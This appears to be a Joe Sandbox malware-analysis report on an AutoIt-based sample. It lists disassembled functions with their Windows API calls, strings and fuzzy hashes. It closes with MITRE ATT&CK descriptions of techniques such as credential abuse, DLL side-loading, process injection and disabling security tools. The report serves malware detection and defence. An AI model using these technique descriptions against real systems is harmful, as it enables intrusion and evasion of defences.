Function 009E6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 009E6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009E6DC2

Strings

static, xrefs: 009E6D22

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: dd6a776f61ae9a400b44df3307fb6e3c67352c76a23de37ecceb6d7b02be3398
Instruction ID: ee1e7629e06ef0bda065fb47c3fb4ea4e38c91b4babf1429bc5ccffd1c107db5
Opcode Fuzzy Hash: dd6a776f61ae9a400b44df3307fb6e3c67352c76a23de37ecceb6d7b02be3398
Instruction Fuzzy Hash: 4531AD71210244AEDB119F69CC90BFB73BDFF98760F508629F9A987190CA31AC91DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009C2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009C2E3B

Strings

0, xrefs: 009C2DF9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 429046c93e61179c89f285ee9dedc2bb71be820cd5b9f2ff6a0bb2930f37ad0a
Instruction ID: 4615d27302d55ddcdc04695201ad3e7016f8cd01ae5e00ab2602dc04abd2883d
Opcode Fuzzy Hash: 429046c93e61179c89f285ee9dedc2bb71be820cd5b9f2ff6a0bb2930f37ad0a
Instruction Fuzzy Hash: B631D531E04309ABEB24DF58D885FEEBBBDEF45350F18442EE985A71A0D7709944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009E6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009E69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E69DB

Strings

Combobox, xrefs: 009E699D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 7a81cd7fe2f3070f350570d6ce90012afc94372076d6b8425f394b5395703ab9
Instruction ID: 5e66aaae8b139ca2e70344893201f6b97143652ba9f99e23c0deeafda41cf6ba
Opcode Fuzzy Hash: 7a81cd7fe2f3070f350570d6ce90012afc94372076d6b8425f394b5395703ab9
Instruction Fuzzy Hash: 4C11B2716002487FEF129F19CC90FBB376EEBA93A4F110125F9589B291D675AC5187A0

Uniqueness

Uniqueness Score: -1.00%

Function 009E6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00961D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00961D73
Part of subcall function 00961D35: GetStockObject.GDI32(00000011), ref: 00961D87
Part of subcall function 00961D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00961D91

GetWindowRect.USER32(00000000,?), ref: 009E6EE0
GetSysColor.USER32(00000012), ref: 009E6EFA

Strings

static, xrefs: 009E6EBD

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 05ebb8d60bdd3696bc3d6505a57305e60091817170ab065a383aab4b1bbe2216
Instruction ID: 735b0edd4b9ee14fb9e44fb684b915d9768b6c8df4dc695468369774983f8776
Opcode Fuzzy Hash: 05ebb8d60bdd3696bc3d6505a57305e60091817170ab065a383aab4b1bbe2216
Instruction Fuzzy Hash: F1218932610249AFDB05DFA8CC45AFA7BB8FB08354F004A29F955D3241D634E8619B50

Uniqueness

Uniqueness Score: -1.00%

Function 009E6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 009E6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009E6C20

Strings

edit, xrefs: 009E6BF5

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 56354058b14494cb606530e2f878bf22999f355ba82f8b09cff75641e4ba46ef
Instruction ID: aa2c73cd45ca681d491d898841944a4e3d09da0fa69af28ebaadedd081b02439
Opcode Fuzzy Hash: 56354058b14494cb606530e2f878bf22999f355ba82f8b09cff75641e4ba46ef
Instruction Fuzzy Hash: ED11BF71104188ABEB128F65DC51AFB376DEB653B8F204724F9A0D71D0C735DC919760

Uniqueness

Uniqueness Score: -1.00%

Function 009C2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009C2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009C2F30

Strings

0, xrefs: 009C2F07

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a1c2cc75b39c32ca7cfdc1b28bee3fe15e108f606c04f4596f689a3b3397b670
Instruction ID: b24959f097256878a74eae7e6022abfdcf2516a8d9089c18355ede4977051e84
Opcode Fuzzy Hash: a1c2cc75b39c32ca7cfdc1b28bee3fe15e108f606c04f4596f689a3b3397b670
Instruction Fuzzy Hash: 0D119031D02218ABDB21DB99DC44FA977BDEB05350F1440BDE854B72A0D7B0ED0587A2

Uniqueness

Uniqueness Score: -1.00%

Function 009D24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009D2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009D2549

Strings

<local>, xrefs: 009D2511

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 2c5d79f44c9c175249ecba59d4c0e8a993157cafac66063570b88fa90fcb957e
Instruction ID: 1727881b331a1a6364db744d19b2ef484ed16d777361703f6db32d3f535fc75a
Opcode Fuzzy Hash: 2c5d79f44c9c175249ecba59d4c0e8a993157cafac66063570b88fa90fcb957e
Instruction Fuzzy Hash: AE110270181225BADB258F519C98EFBFF6CFF26351F10C12BF90546240D2706981DAF0

Uniqueness

Uniqueness Score: -1.00%

Function 009D80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009D830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009D80C8,?,00000000,?,?), ref: 009D8322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009D80CB
htons.WSOCK32(00000000,?,00000000), ref: 009D8108

Strings

255.255.255.255, xrefs: 009D80E3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 8d43885d8ab16f74b60fa536f708f6e1d4eecd5bf22e7e1f710bd8089f36dbea
Instruction ID: 26b259158fee8e9b8483bd995d46938b8cdbd6c26f8da7d83bec19a6d20587d6
Opcode Fuzzy Hash: 8d43885d8ab16f74b60fa536f708f6e1d4eecd5bf22e7e1f710bd8089f36dbea
Instruction Fuzzy Hash: 2611A174644209ABDB20AF64CC96FFEB364FF44320F10852BE9119B392DA72A815D695

Uniqueness

Uniqueness Score: -1.00%

Function 009B92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009BB0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009B9355

Strings

ListBox, xrefs: 009B931F
ComboBox, xrefs: 009B92F4

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 16b6d4c24b10477eb8664331ca533b4b6247937bd5b0439d8ffda13a60a5de3e
Instruction ID: db49c18a5caab38319dcf4bef8bd6c41b8a06b4de23d4e6e77caf71a55e2162c
Opcode Fuzzy Hash: 16b6d4c24b10477eb8664331ca533b4b6247937bd5b0439d8ffda13a60a5de3e
Instruction Fuzzy Hash: 2C01F171A05218ABCB08FBA0CDA1EFE77ADBF46330B100A19F972672D2DB31590CC650

Uniqueness

Uniqueness Score: -1.00%

Function 009B91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009BB0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 009B924D

Strings

ListBox, xrefs: 009B9217
ComboBox, xrefs: 009B91EC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: edd80ee968a9bb7743a2d48366abd196171d86454c3039312a26ed53bb14af2b
Instruction ID: 9439ba0117f067b8e4553120604c349758413b22173dd7e8cc297f33dfee90d1
Opcode Fuzzy Hash: edd80ee968a9bb7743a2d48366abd196171d86454c3039312a26ed53bb14af2b
Instruction Fuzzy Hash: 8001A771E411087BCB04EBE0CAA2FFF77AD9F45310F140019BA52672D2EA155F1C9671

Uniqueness

Uniqueness Score: -1.00%

Function 009B9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009BB0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 009B92D0

Strings

ListBox, xrefs: 009B929C
ComboBox, xrefs: 009B9271

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7eac1d1d3ee92c614e9b3d3c3c209eab843e0ca77334a5ec2ba20d77d30a0e03
Instruction ID: d96b6ae64ef92d18ff57e5902fbb895862dc0a242a83753e86f18db26f507ad6
Opcode Fuzzy Hash: 7eac1d1d3ee92c614e9b3d3c3c209eab843e0ca77334a5ec2ba20d77d30a0e03
Instruction Fuzzy Hash: CE01A271E411087BCB04EBA4CA92FFFB7AC9F11320F240515B952632C2DA255F0C9271

Uniqueness

Uniqueness Score: -1.00%

Function 009C51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009C51E8
_wcscmp.LIBCMT ref: 009C51FA

Strings

#32770, xrefs: 009C51F4

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: deb6c0ea7a36849dbed383f8b547985c763c3175f909248b76e22bd6c98f4aba
Instruction ID: 0981285d087592160168817aea02662e7cccf4b9f5aa620da2581ee97ac1c40f
Opcode Fuzzy Hash: deb6c0ea7a36849dbed383f8b547985c763c3175f909248b76e22bd6c98f4aba
Instruction Fuzzy Hash: 62E06132A0422C27D320D6999C45FE7F7ECEB40731F00016BFD10D3050D5709A4587D1

Uniqueness

Uniqueness Score: -1.00%

Function 009B81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009B81CA

Part of subcall function 00983598: _doexit.LIBCMT ref: 009835A2

Strings

AutoIt, xrefs: 009B81BE
Error allocating memory., xrefs: 009B81C3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 589cf2220904d19a5467262e71481fd63467cc37837a80f6fd2e9c4639381452
Instruction ID: 529d10b3779cda13898fe6279c1ec7912bf464b129cf389879fc2896f769e237
Opcode Fuzzy Hash: 589cf2220904d19a5467262e71481fd63467cc37837a80f6fd2e9c4639381452
Instruction Fuzzy Hash: D0D0123228536832D21432A86D06BD6764C4B45F55F004416BB08555D389D1598293D9

Uniqueness

Uniqueness Score: -1.00%

Function 0099B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0099B564: _memset.LIBCMT ref: 0099B571

Part of subcall function 00980B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0099B540,?,?,?,0096100A), ref: 00980B89

IsDebuggerPresent.KERNEL32(?,?,?,0096100A), ref: 0099B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0096100A), ref: 0099B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0099B54E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 81423bdd0e8c89798cd484f5d2d7f3bf51275d5bc228ee0a593902454f63dfe0
Instruction ID: 7365f9debd2bddfbb99b1f51ac0797c4f5e751eb0ae6add18306282b5d9b602f
Opcode Fuzzy Hash: 81423bdd0e8c89798cd484f5d2d7f3bf51275d5bc228ee0a593902454f63dfe0
Instruction Fuzzy Hash: 62E06D70604355CBDB20DF28E5483427BE4AB40754F01892DF456C6391D7B8D808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009E5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E5BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009E5C08

Part of subcall function 009C54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009C555E

Strings

Shell_TrayWnd, xrefs: 009E5BEE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e7e0fc4bb0416245769891e9483e3607468359dbdcd47b2ffdab955d39e44767
Instruction ID: 7f840376802b7045a81ef244db70c54db966697ae54469fcd543364f3c64498c
Opcode Fuzzy Hash: e7e0fc4bb0416245769891e9483e3607468359dbdcd47b2ffdab955d39e44767
Instruction Fuzzy Hash: 76D0A931398300B7E728AB30AC5BFE36A10AB90B40F00082AB205AA0E0C8E06C40C200

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
